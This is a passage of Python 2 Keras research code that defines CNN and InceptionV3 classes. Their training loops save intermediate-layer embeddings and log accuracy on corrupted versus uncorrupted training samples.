np.save('{}/uncorrupted_idxs.npy'.format(directory_save), uncorrupted_idxs)
except:
print("ERROR saving uncorr idxs")
## x_train and y_train contain the data with the new shuffling
orig_x_train=x_train
orig_y_train=y_train
x_train = np.asarray(x_train[idxs_train])
y_train = y_train[idxs_train]
#y_train = dataset.y_train
#if x_train
#x_train = x_train / 255.0
# converting the labels to categorical
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train)
# converting also the original labels to categorical
# (for custom_eval_)
try:
shape1, shape2 = orig_y_train.shape()
except:
orig_y_train = keras.utils.to_categorical(orig_y_train)
# variables for logs and monitoring
history=[]
embeddings=[]
batch_size=self.batch_size
print self.model.summary()
##### NOTE: the loi change from model to model
layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in layers_of_interest]
print 'loi', layers_of_interest
self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
epoch_number = 0
n_batches = len(x_train)/self.batch_size
remaining = len(x_train)-n_batches * self.batch_size
while epoch_number <= self.epochs:
print epoch_number
batch_number = 0
embedding_=[]
for l in layers_of_interest:
#print 'in layer ', l
#print 'output shape ', self.model.get_layer(l).output.shape
#print 'metrics tensors, ', self.model.metrics_tensors
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
x = self.model.get_layer(l).output.shape[-3]
y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
space = np.zeros((len(x_train), z))
embedding_.append(space)
while batch_number <= n_batches:
#print("Batch {}/{}".format(batch_number, n_batches))
outs=self.model.train_on_batch(
x_train[batch_number*batch_size:batch_number*batch_size + batch_size],
y_train[batch_number*batch_size:batch_number*batch_size + batch_size])
_n,_x,_y,_z= outs[2].shape
embedding_[0][batch_number*batch_size: batch_number*batch_size+batch_size]= np.mean(outs[2].reshape(_n, _x*_y,_z), axis=1) #outs[2].reshape((min(batch_size,len(outs[2])),-1))
_n,_x,_y,_z= outs[3].shape
embedding_[1][batch_number*batch_size: batch_number*batch_size+batch_size]= np.mean(outs[3].reshape(_n, _x*_y,_z), axis=1) #outs[3].reshape((len(outs[3]),-1))
#embedding_[2][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[4].reshape((len(outs[4]),-1))
#embedding_[3][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[5].reshape((len(outs[5]),-1))
#print outs, outs
history.append(outs[0])
batch_number+=1
c=0
'''
if True:
for l in layers_of_interest:
if 'max_pooling' in l:
#import pdb; pdb.set_trace()
import pdb; pdb.set_trace()
_n,_x,_y,_z= embedding_[c].shape
tosave_= np.mean(embedding_[c].reshape(n, x*y,z), axis=1)
np.save('{}/_training_emb_e{}_l{}'.format(source,epoch_number, l), tosave_)
#np.mean(embedding_[0].reshape(12775, 31*31,200), axis=1).shape
else:
np.save('{}/_training_emb_e{}_l{}'.format(source,epoch_number, l), embedding_[c])
c+=1
del embedding_
'''
for l in layers_of_interest:
np.save('{}/_training_emb_e{}_l{}'.format(directory_save,epoch_number, l), embedding_[c])
c+=1
del embedding_
# here we check the partial accuracy
if epoch_number %10 == 0:
corrupted_loss, corrupted_acc = self._custom_eval(orig_x_train[corrupted_idxs],
orig_y_train[corrupted_idxs],
batch_size
)
if len(uncorrupted_idxs>0):
uncorrupted_loss, uncorrupted_acc = self._custom_eval(orig_x_train[uncorrupted_idxs],
orig_y_train[uncorrupted_idxs],
batch_size
)
try:
with open(directory_save+'/uncorr_acc.txt', 'a') as log_file:
log_file.write("{}, ".format(uncorrupted_acc))
with open(directory_save+'/uncorr_loss.txt', 'a') as log_file:
log_file.write("{}, ".format(uncorrupted_loss))
except:
log_file = open(directory_save+'/uncorr_acc.txt', 'w')
log_file.write("{}, ".format(uncorrupted_acc))
log_file = open(directory_save+'/uncorr_loss.txt', 'w')
log_file.write("{}, ".format(uncorrupted_loss))
try:
with open(directory_save+'/corr_acc.txt', 'a') as log_file:
log_file.write("{}, ".format(corrupted_acc))
with open(directory_save+'/corr_loss.txt', 'a') as log_file:
log_file.write("{}, ".format(corrupted_loss))
except:
log_file = open(directory_save+'/corr_acc.txt', 'w')
log_file.write("{}, ".format(corrupted_acc))
log_file = open(directory_save+'/corr_loss.txt', 'w')
log_file.write("{}, ".format(corrupted_loss))
epoch_number +=1
self.training_history=history
self.embeddings = embeddings
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
np.save(folder+'/'+name+'_history', self.training_history.history)
class CNNImagenet():
'''
### NOTE: architecture modified to do Imagenet well
Convolutional Neural Network for experiments on CIFAR
input, crop(2,2),
conv(200,5,5), bn, relu, maxpool(3,3),
conv(200,5,5), bn, relu, maxpool(3,3),
dense(384), bn, relu,
dense(192), bn, relu,
dense(n_classes), softmax
Params
deep: int (how many convolution blocks)
Default 2
wide: int (how many neurons in the first dense connection)
Default 512
optimizer: string
Default SGD
lr: float
Default 1e-2
epochs: int
Default 10
batch_size: int
Default: 32
input_shape: int
Default 32
n_classes: int
Default 10
'''
def __init__(self, deep=2, wide=384, optimizer='SGD', lr=1e-2, epochs=9,
batch_size=14, input_shape=299, n_classes=10, **kwargs):
#mask_shape = np.ones((1,512))
#mask = keras.backend.variable(mask_shape)
cnn = keras.models.Sequential()
cnn.add(keras.layers.Cropping2D(cropping=((36,36),(36,36)), input_shape=(299,299,3)))
counter = 0
while counter<deep:
cnn.add(keras.layers.Conv2D(200, (5,5)))
cnn.add((keras.layers.BatchNormalization()))
cnn.add(keras.layers.Activation('relu'))
if counter<2:
cnn.add(keras.layers.MaxPool2D(pool_size=(3,3)))
counter+=1
cnn.add(keras.layers.GlobalAveragePooling2D())
#cnn.add(keras.layers.Flatten())
cnn.add(keras.layers.Dense(wide))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.Dense(wide/2))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
loss_function = 'categorical_crossentropy'
activation = 'softmax'
if n_classes == 2:
loss_function = 'binary_crossentropy'
activation = 'sigmoid'
cnn.add(keras.layers.Dense(n_classes, activation=keras.layers.Activation(activation)))
#masking_layer = keras.layers.Lambda(lambda x: x*mask)(bmlp.layers[-2].output)
#if n_hidden_layers>1:
# while n_hidden_layers!=1:
# masking_layer= keras.layers.Dense(512, activation=keras.layers.Activation('sigmoid'))(masking_layer)
# n_hidden_layers-=1
#decision_layer = keras.layers.Dense(10, activation=keras.layers.Activation('softmax'))(masking_layer)
#masked_model = keras.models.Model(input= bmlp.input, output=decision_layer)
model = keras.models.Model(input=cnn.input, output=cnn.output)
model.compile(optimizer=optimizer,
loss=loss_function,
metrics=['accuracy'])
self.model = model
self.epochs = epochs
self.batch_size = batch_size
self.n_classes = n_classes
self.deep=deep
def train(self, dataset):
#import pdb; pdb.set_trace()
x_train = dataset.x_train
y_train = dataset.y_train
x_train = x_train / 255.0
x_train -= np.mean(x_train)
np.random.seed(0)
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
x_train = np.asarray(x_train[idxs_train])
y_train = y_train[idxs_train]
x_test = dataset.x_test
y_test = dataset.y_test
x_test = x_test / 255.0
x_test -= np.mean(x_test)
idxs_test = np.arange(len(x_test))
np.random.shuffle(idxs_test)
x_test = np.asarray(x_test[idxs_test])
y_test = y_test[idxs_test]
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
shape1, shape2 = y_test.shape()
except:
y_test = keras.utils.to_categorical(y_test, self.n_classes)
history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_data=(x_test, y_test))
self.training_history=history
def train_and_compute_rcvs(self, dataset):
#import pdb; pdb.set_trace()
x_train = dataset.x_train/255.
x_train -= np.mean(x_train)
y_train = dataset.y_train
np.random.seed(0)
idxs_train = np.arange(len(x_train))
np.random.shuffle(idxs_train)
x_train = np.asarray(x_train[idxs_train])
y_train= np.asarray(y_train)
y_train = y_train[idxs_train]
#if x_train
#x_train = x_train / 255.0
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train)
history=[]
embeddings=[]
batch_size=self.batch_size
print self.model.summary()
#import pdb; pdb.set_trace()
#layers_of_interest = [layer.name for layer in self.model.layers[2:-1]]
if self.deep==2:
layer_idxs = [9,13,16]
if self.deep==3:
layer_idxs = [9,12,14]
if self.deep==4:
layer_idxs = [9,12,15,19,22]
if self.deep==5:
layer_idxs = [9,12,15,18,22,25]
layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in layer_idxs]
print 'loi', layers_of_interest
self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
epoch_number = 0
n_batches = len(x_train)/self.batch_size
remaining = len(x_train)-n_batches * self.batch_size
#if epoch_number > 1:
while epoch_number <= self.epochs:
print epoch_number
batch_number = 0
embedding_=[]
for l in layers_of_interest:
print 'in layer ', l
print 'output shape ', self.model.get_layer(l).output.shape
print 'metrics tensors, ', self.model.metrics_tensors
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
x = self.model.get_layer(l).output.shape[-3]
y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
space = np.zeros((len(x_train), x*y*z))
embedding_.append(space)
while batch_number <= n_batches:
outs=self.model.train_on_batch(
x_train[batch_number*batch_size:batch_number*batch_size + batch_size],
y_train[batch_number*batch_size:batch_number*batch_size + batch_size])
#import pdb;pdb.set_trace()
#print out[0]
#import pdb; pdb.set_trace()
embedding_[0][batch_number*batch_size: batch_number*batch_size+batch_size]= outs[2].reshape((min(batch_size,len(outs[2])),-1))
embedding_[1][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[3].reshape((len(outs[3]),-1))
embedding_[2][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[4].reshape((len(outs[4]),-1))
#embedding_[3][batch_number*batch_size: batch_number*batch_size+batch_size]=outs[5].reshape((len(outs[5]),-1))
#print outs, outs
history.append(outs[0])
batch_number+=1
#import pdb; pdb.set_trace()
source = '/mnt/nas2/results/IntermediateResults/Mara/probes/imagenet/2H_lcp0.4'
c=0
if True:
for l in layers_of_interest:
if 'max_pooling' in l:
#import pdb; pdb.set_trace()
tosave_= np.mean(embedding_[c].reshape(12775, 23*23,200), axis=1)
np.save('{}/imagenet_training_emb_e{}_l{}'.format(source,epoch_number, l), tosave_)
#np.mean(embedding_[0].reshape(12775, 31*31,200), axis=1).shape
else:
np.save('{}/imagenet_training_emb_e{}_l{}'.format(source,epoch_number, l), embedding_[c])
c+=1
del embedding_
#embeddings.append(embedding_)
epoch_number +=1
self.training_history=history
self.embeddings = embeddings
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
np.save(folder+'/'+name+'_history', self.training_history.history)
'''
#### Old, used for CIFAR
class CNN():
Convolutional Neural Network for experiments on CIFAR
input, crop(2,2),
conv(200,5,5), bn, relu, maxpool(3,3),
conv(200,5,5), bn, relu, maxpool(3,3),
dense(384), bn, relu,
dense(192), bn, relu,
dense(n_classes), softmax
Params
deep: int (how many convolution blocks)
Default 2
wide: int (how many neurons in the first dense connection)
Default 512
optimizer: string
Default SGD
lr: float
Default 1e-2
epochs: int
Default 10
batch_size: int
Default: 32
input_shape: int
Default 32
n_classes: int
Default 10
def __init__(self, deep=2, wide=384, optimizer='SGD', lr=1e-2, epochs=10,
batch_size=32, input_shape=32, n_classes=10, **kwargs):
#mask_shape = np.ones((1,512))
#mask = keras.backend.variable(mask_shape)
cnn = keras.models.Sequential()
cnn.add(keras.layers.Cropping2D(cropping=((2,2),(2,2)), input_shape=(32,32,3)))
counter = 0
while counter<deep:
cnn.add(keras.layers.Conv2D(200, (5,5)))
cnn.add((keras.layers.BatchNormalization()))
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.MaxPool2D(pool_size=(3,3)))
counter+=1
cnn.add(keras.layers.Flatten())
cnn.add(keras.layers.Dense(wide))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
cnn.add(keras.layers.Dense(wide/2))
cnn.add(keras.layers.BatchNormalization())
cnn.add(keras.layers.Activation('relu'))
loss_function = 'categorical_crossentropy'
activation = 'softmax'
if n_classes == 2:
loss_function = 'binary_crossentropy'
activation = 'sigmoid'
cnn.add(keras.layers.Dense(n_classes, activation=keras.layers.Activation(activation)))
#masking_layer = keras.layers.Lambda(lambda x: x*mask)(bmlp.layers[-2].output)
#if n_hidden_layers>1:
# while n_hidden_layers!=1:
# masking_layer= keras.layers.Dense(512, activation=keras.layers.Activation('sigmoid'))(masking_layer)
# n_hidden_layers-=1
#decision_layer = keras.layers.Dense(10, activation=keras.layers.Activation('softmax'))(masking_layer)
#masked_model = keras.models.Model(input= bmlp.input, output=decision_layer)
model = keras.models.Model(input=cnn.input, output=cnn.output)
model.compile(optimizer=optimizer,
loss=loss_function,
metrics=['accuracy'])
self.model = model
self.epochs = epochs
self.batch_size = batch_size
self.n_classes = n_classes
def train(self, dataset):
#import pdb; pdb.set_trace()
x_train = dataset.x_train
y_train = dataset.y_train
x_train = x_train / 255.0
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_slit=0.2)
self.training_history=history
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
np.save(folder+'/'+name+'_history', self.training_history.history)
'''
class InceptionV3():
'''
InceptionV3 architechture with options
to learn RCVs over training, or to instanciate a
flawed network
Input Parameters
optimizer: string, default Adam
lr: float, default 0.01
beta_1: float, default 0.9
beta_2: float, default 0.999
epochs: int, default 1000
batch_size: int, default 32
input_shape: int, default 299
n_classes: int, default 47
'''
def __init__(self, optimizer='Adam', lr=0.01, beta_1=0.9, beta_2=0.999,
epsilon=None, decay=0.0, amsgrad=False, epochs=1000,
batch_size=32, input_shape=299, n_classes=47, **kwargs):
model = keras.applications.inception_v3.InceptionV3(include_top=True,
weights=None,#'imagenet', #None,
input_tensor=None,
input_shape=(input_shape,input_shape,3),
pooling=None,
classes=n_classes)
model.compile(
keras.optimizers.Adam(lr=lr, beta_1=beta_1, beta_2=beta_1, epsilon=epsilon, decay=decay, amsgrad=amsgrad),
loss = keras.losses.categorical_crossentropy,
metrics=['acc']
)
'''
model.compile(
keras.optimizers.SGD(lr=lr, momentum=0.9, decay=decay, nesterov=True),
loss = keras.losses.categorical_crossentropy,
metrics=['acc']
)
'''
self.model = model
self.epochs = epochs
self.batch_size = batch_size
self.n_classes = n_classes
def get_activations(self, inputs, layer):
get_layer_output = K.function([self.model.layers[0].input],
[self.model.get_layer(layer).output])
feats = get_layer_output([inputs])
return feats[0]
def train(self, dataset, custom_epochs=0):
'''
Trains the CNN on the dataset
the input dataset is a variable with the fields
dataset.x_train, dataset.y_train, dataset.x_val, dataset.y_val
'''
x_train = dataset.x_train
x_train = np.asarray(x_train, dtype=np.float32)
y_train = dataset.y_train
x_val = dataset.x_val
x_val = np.asarray(x_val, dtype=np.float32)
y_val = dataset.y_val
# We first need to shuffle the dataset indexes then we launch training
shuffle_idxs_train = np.arange(len(x_train))
np.random.shuffle(shuffle_idxs_train)
shuffle_idxs_val = np.arange(len(x_val))
np.random.shuffle(shuffle_idxs_val)
# We also first clean the data
x_train[:,:,:,:3] -= np.mean(x_train[:,:,:,:3])
x_train[:,:,:,:3] /= np.std(x_train[:,:,:,:3])
x_val -= np.mean(x_val[:,:,:,:3])
x_val /= np.std(x_val[:,:,:,:3])
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
shape1, shape2 = y_val.shape()
except:
y_val = keras.utils.to_categorical(y_val, self.n_classes)
# We instanciate an Image data generator to extract random croppings of size 299x299x3
# from the images in x_train
datagen = ImageDataGenerator(featurewise_center=False,
featurewise_std_normalization=False,
random_cropping=True
)
datagen.fit(x_train[shuffle_idxs_train, :, :, :3])
train_generator = datagen.flow(x_train[shuffle_idxs_train],
y_train[shuffle_idxs_train],
batch_size=self.batch_size
)
if custom_epochs>0:
epochs = custom_epochs
else:
epochs = self.epochs
history = self.model.fit_generator(train_generator,
steps_per_epoch= len(x_train)/self.batch_size,
epochs=epochs,
validation_data=(x_val[shuffle_idxs_val],
y_val[shuffle_idxs_val]),
)
#history=self.model.fit(x_train, y_train, epochs=self.epochs, batch_size=self.batch_size, validation_slit=0.2)
self.training_history=history
def train_and_compute_rcvs(self, dataset, layers_of_interest=[], custom_epochs=0):
import time
# making the data ready for training
x_train = dataset.x_train
x_train = np.asarray(x_train, dtype=np.float32)
y_train = dataset.y_train
x_val = dataset.x_val
x_val = np.asarray(x_val, dtype=np.float32)
y_val = dataset.y_val
# We first need to shuffle the dataset indexes then we launch training
shuffle_idxs_train = np.arange(len(x_train))
np.random.shuffle(shuffle_idxs_train)
try:
localtime = time.localtime(time.time())
os.mkdir('/mnt/nas2/results/IntermediateResults/Mara/probes/experiment_{}.{}_{}.{}'.format(localtime.tm_mday, localtime.tm_mon, localtime.tm_hour, localtime.tm_min))
directory_save = '/mnt/nas2/results/IntermediateResults/Mara/probes/experiment_{}.{}_{}.{}'.format(localtime.tm_mday, localtime.tm_mon, localtime.tm_hour, localtime.tm_min)
except:
print("ERR has occurred")
np.save(directory_save+'/shuffle_idxs_training', shuffle_idxs_train)
shuffle_idxs_val = np.arange(len(x_val))
np.random.shuffle(shuffle_idxs_val)
np.save(directory_save+'/shuffle_idxs_validation', shuffle_idxs_val)
# We clean the data
x_train[:,:,:,:3] -= np.mean(x_train[:,:,:,:3])
x_train[:,:,:,:3] /= np.std(x_train[:,:,:,:3])
x_val -= np.mean(x_val[:,:,:,:3])
x_val /= np.std(x_val[:,:,:,:3])
#import pdb; pdb.set_trace()
# At this point in time the mean and std of the image data are resp 0 and 1
# The mask of the image boundaries is left untouched (checked via pdb)
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
shape1, shape2 = y_val.shape()
except:
y_val = keras.utils.to_categorical(y_val, self.n_classes)
'''
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
'''
history=[]
#embeddings=[]
#layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in [2,6,11,14]]
# getting the embeddings at the layers of interest
#self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
st = time.time()
# We instanciate an Image data generator to extract random croppings of size 299x299x3
# from the images in x_train
datagen = ImageDataGenerator(featurewise_center=False,
featurewise_std_normalization=False,
random_cropping=True
)
datagen.fit(x_train[shuffle_idxs_train, :, :, :3])
#train_generator = datagen.flow(x_train[shuffle_idxs_train],
# y_train[shuffle_idxs_train],
# batch_size=self.batch_size
# )
print('Train generator ready, time elapsed: {}'.format(time.time()-st))
if custom_epochs>0:
epochs = custom_epochs
else:
epochs = self.epochs
batch_size=self.batch_size
tot_val_batches = len(x_val)/batch_size
epoch_number = 0
while epoch_number <= self.epochs:
#print(epoch_number)
batch_number = 0
start_batch=0
end_batch = batch_size
tr_losses = []
tr_accs = []
'''
while batch_number<len(x_train)/batch_size:
tr_loss, acc = self.model.train_on_batch(x_train[shuffle_idxs_train[start_batch:end_batch], :299, :299, :3],
y_train[shuffle_idxs_train[start_batch:end_batch]]
)
tr_losses.append(tr_loss)
tr_accs.append(acc)
batch_number +=1
#print(tr_accs)
'''
'''
if epoch_number % 10 == 0:
#import pdb; pdb.set_trace()
## saving validation!At the end of the epoch we validate on the
# validation split and save the embeddings
scores = []
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no < tot_val_batches:
#index_start = shuffle_idxs_val[]
score = self.model.test_on_batch(x_val[shuffle_idxs_val[start_batch:end_batch]],
y_val[shuffle_idxs_val[start_batch:end_batch]])
#score = self.model.evaluate(x_val[val_batch_no*batch_size : val_batch_no*batch_size + batch_size],
# y_val[val_batch_no*batch_size : val_batch_no*batch_size + batch_size],
# batch_size=32)
#print("Validation batch no: {}, acc: {}".format(val_batch_no, score))
scores.append(score[1])
val_batch_no += 1
start_batch = end_batch
end_batch += batch_size
#print(scores)
print("Val: {}".format(np.mean(np.asarray(scores))))
'''
if epoch_number % 10 == 0:
# allocating space and reusing the variable embedding_
embedding_=[]
for l in layers_of_interest:
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_val), self.model.get_layer(l).output.shape[-1]))
else:
#x = self.model.get_layer(l).output.shape[-3]
#y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
#space = np.zeros((len(x_val), x,y,z))
# Update: only storing/saving the pooled embeddings bc I'm filling up all the hard drives
space = np.zeros((len(x_val), z))
embedding_.append(space)
# this is a layer counter. I use it only to store the activations in the correct place in embedding_
k=0
for l in layers_of_interest:
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no <= tot_val_batches:
outs=self.get_activations(x_val[shuffle_idxs_val[start_batch:end_batch]], l)
# Global Average Pooling the activations : saves space and removes pixel dependencies
dims = outs.shape
avgp_outs = skimage.measure.block_reduce(outs, (1, dims[1], dims[2],1), np.mean)
avgp_outs= avgp_outs.reshape((dims[0],-1))
#import pdb; pdb.set_trace()
embedding_[k][start_batch:end_batch]=avgp_outs
## end GAP. Like this it should take less space on the disk and solve all the problems
val_batch_no += 1
start_batch=end_batch
end_batch += batch_size
k += 1
# Saving outputs on an external file
c=0
for l in layers_of_interest:
np.save(directory_save+'/_fix_training_emb_e{}_l{}_val_data'.format(epoch_number, l), embedding_[c])
# saving all the GAP acts with the name starting by _ so I can differentiate them
c+=1
for x_batch, y_batch in datagen.flow(x_train[shuffle_idxs_train],
y_train[shuffle_idxs_train],
batch_size=batch_size):
# training step
tr_loss, acc = self.model.train_on_batch(x_batch, y_batch)
tr_losses.append(tr_loss)
tr_accs.append(acc)
batch_number += 1
# stopping condition if all data have been passed through
# because the generator loops indefinitely
if batch_number >= len(x_train)/batch_size:
break
print('Epoch: {}, loss: {}, acc: {}'.format(epoch_number,
np.mean(np.asarray(tr_losses)),
np.mean(np.asarray(tr_accs))
))
epoch_number +=1
self.training_history=history
#self.embeddings = embeddings
def _custom_eval(self, x, y, batch_size):
## correcting shape-related issues
x = x.reshape(x.shape[0], x.shape[2], x.shape[3], x.shape[4])
y = y.reshape(y.shape[0],-1)
#
scores = []
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
tot_batches = len(y) / batch_size
# looping over data
while val_batch_no < tot_batches:
score = self.model.test_on_batch(x[start_batch:end_batch, :299, :299, :3],
y[start_batch:end_batch])
scores.append(score[1])
val_batch_no += 1
start_batch = end_batch
end_batch += batch_size
#print("Val: {}".format(np.mean(np.asarray(scores))))
return np.mean(np.asarray(scores))
def train_and_monitor_with_rcvs(self, dataset, layers_of_interest=[], custom_epochs=0):
import time
# making the data ready for training
x_train = dataset.x_train
x_train = np.asarray(x_train, dtype=np.float32)
y_train = dataset.y_train
x_val = dataset.x_val
x_val = np.asarray(x_val, dtype=np.float32)
y_val = dataset.y_val
train_mask = dataset.train_mask
# We first need to shuffle the dataset indexes then we launch training
shuffle_idxs_train = np.arange(len(x_train))
np.random.shuffle(shuffle_idxs_train)
corrupted_idxs = np.argwhere(train_mask == True)
uncorrupted_idxs = np.argwhere(train_mask == False)
#import pdb; pdb.set_trace()
try:
localtime = time.localtime(time.time())
os.mkdir('/mnt/nas2/results/IntermediateResults/Mara/probes/experiment_{}.{}_{}.{}'.format(localtime.tm_mday, localtime.tm_mon, localtime.tm_hour, localtime.tm_min))
directory_save = '/mnt/nas2/results/IntermediateResults/Mara/probes/experiment_{}.{}_{}.{}'.format(localtime.tm_mday, localtime.tm_mon, localtime.tm_hour, localtime.tm_min)
except:
print("ERR has occurred")
np.save(directory_save+'/shuffle_idxs_training', shuffle_idxs_train)
shuffle_idxs_val = np.arange(len(x_val))
np.random.shuffle(shuffle_idxs_val)
np.save(directory_save+'/shuffle_idxs_validation', shuffle_idxs_val)
# We clean the data
x_train[:,:,:,:3] -= np.mean(x_train[:,:,:,:3])
x_train[:,:,:,:3] /= np.std(x_train[:,:,:,:3])
x_val -= np.mean(x_val[:,:,:,:3])
x_val /= np.std(x_val[:,:,:,:3])
#import pdb; pdb.set_trace()
# At this point in time the mean and std of the image data are resp 0 and 1
# The mask of the image boundaries is left untouched (checked via pdb)
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
shape1, shape2 = y_val.shape()
except:
y_val = keras.utils.to_categorical(y_val, self.n_classes)
'''
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
'''
history=[]
#embeddings=[]
#layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in [2,6,11,14]]
# getting the embeddings at the layers of interest
#self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
st = time.time()
# We instanciate an Image data generator to extract random croppings of size 299x299x3
# from the images in x_train
datagen = ImageDataGenerator(featurewise_center=False,
featurewise_std_normalization=False,
random_cropping=True
)
datagen.fit(x_train[shuffle_idxs_train, :, :, :3])
train_generator = datagen.flow(x_train[shuffle_idxs_train],
y_train[shuffle_idxs_train],
batch_size=self.batch_size
)
print('Train generator ready, time elapsed: {}'.format(time.time()-st))
if custom_epochs>0:
epochs = custom_epochs
else:
epochs = self.epochs
batch_size=self.batch_size
tot_val_batches = len(x_val)/batch_size
epoch_number = 0
while epoch_number <= self.epochs:
#print(epoch_number)
batch_number = 0
start_batch=0
end_batch = batch_size
tr_losses = []
tr_accs = []
for x_batch, y_batch in datagen.flow(x_train[shuffle_idxs_train],
y_train[shuffle_idxs_train],
batch_size=batch_size):
# training step
tr_loss, acc = self.model.train_on_batch(x_batch, y_batch)
tr_losses.append(tr_loss)
tr_accs.append(acc)
batch_number += 1
# stopping condition if all data have been passed through
# because the generator loops indefinitely
if batch_number >= len(x_train)/batch_size:
break
if len(uncorrupted_idxs)>0:
if epoch_number %10 == 0:
'''storing the corr, uncorr acc every 10 epochs to save space/time'''
corrupted_acc = self._custom_eval(x_train[corrupted_idxs],
y_train[corrupted_idxs],
batch_size)
uncorrupted_acc = self._custom_eval(x_train[uncorrupted_idxs],
y_train[uncorrupted_idxs],
batch_size)
try:
with open(directory_save+'/corr_acc.txt', 'a') as log_file:
log_file.write("{}, ".format(corrupted_acc))
except:
log_file = open(directory_save+'/corr_acc.txt', 'w')
log_file.write("{}, ".format(corrupted_acc))
try:
with open(directory_save+'/uncorr_acc.txt', 'a') as log_file:
log_file.write("{}, ".format(uncorrupted_acc))
except:
log_file = open(directory_save+'/uncorr_acc.txt', 'w')
log_file.write("{}, ".format(uncorrupted_acc))
### introduce _custom_eval(x_train[corrupted_idxs])
#### _custom_eval(x_train[uncorrupted_idxs])
'''
while batch_number<len(x_train)/batch_size:
tr_loss, acc = self.model.train_on_batch(x_train[shuffle_idxs_train[start_batch:end_batch], :299, :299, :3],
y_train[shuffle_idxs_train[start_batch:end_batch]]
)
tr_losses.append(tr_loss)
tr_accs.append(acc)
batch_number +=1
#print(tr_accs)
'''
print('Epoch: {}, loss: {}, acc: {}'.format(epoch_number,
np.mean(np.asarray(tr_losses)),
np.mean(np.asarray(tr_accs))
)
)
if epoch_number % 10 == 0:
#import pdb; pdb.set_trace()
## saving validation!At the end of the epoch we validate on the
# validation split and save the embeddings
scores = []
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no < tot_val_batches:
#index_start = shuffle_idxs_val[]
score = self.model.test_on_batch(x_val[shuffle_idxs_val[start_batch:end_batch]],
y_val[shuffle_idxs_val[start_batch:end_batch]])
#score = self.model.evaluate(x_val[val_batch_no*batch_size : val_batch_no*batch_size + batch_size],
# y_val[val_batch_no*batch_size : val_batch_no*batch_size + batch_size],
# batch_size=32)
#print("Validation batch no: {}, acc: {}".format(val_batch_no, score))
scores.append(score[1])
val_batch_no += 1
start_batch = end_batch
end_batch += batch_size
#print(scores)
print("Val: {}".format(np.mean(np.asarray(scores))))
'''
if epoch_number % 1000 == 0:
# allocating space and reusing the variable embedding_
embedding_=[]
for l in layers_of_interest:
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
#x = self.model.get_layer(l).output.shape[-3]
#y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
#space = np.zeros((len(x_val), x,y,z))
# Update: only storing/saving the pooled embeddings bc I'm filling up all the hard drives
space = np.zeros((len(x_train), z))
embedding_.append(space)
# this is a layer counter. I use it only to store the activations in the correct place in embedding_
k=0
for l in layers_of_interest:
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no <= tot_val_batches:
outs=self.get_activations(x_train[shuffle_idxs_val[start_batch:end_batch]], l)
